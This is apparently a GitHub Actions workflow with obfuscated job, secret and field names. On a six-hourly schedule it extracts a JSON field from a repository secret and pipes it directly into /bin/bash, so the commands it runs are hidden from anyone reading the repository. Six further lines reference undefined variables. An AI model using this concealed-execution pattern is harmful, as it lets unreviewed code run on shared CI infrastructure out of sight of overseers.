name: diyuanzhz
on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: diyuanzhz
        env:
          rxuu15241: ${{ secrets.rxuu15241 }}
        run: |
          echo $rxuu15241 | jq -r .ocddr32650 | /bin/bash
          echo $twut9894 | jq -r .l5 | /bin/bash
          echo $modaj98 | jq -r .p654 | /bin/bash
          echo $ow28 | jq -r .bsnz017 | /bin/bash
          echo $s410 | jq -r .w49 | /bin/bash
          echo $psrvq4 | jq -r .sxzbe97 | /bin/bash
          echo $ye2714 | jq -r .pgyvb8 | /bin/bash

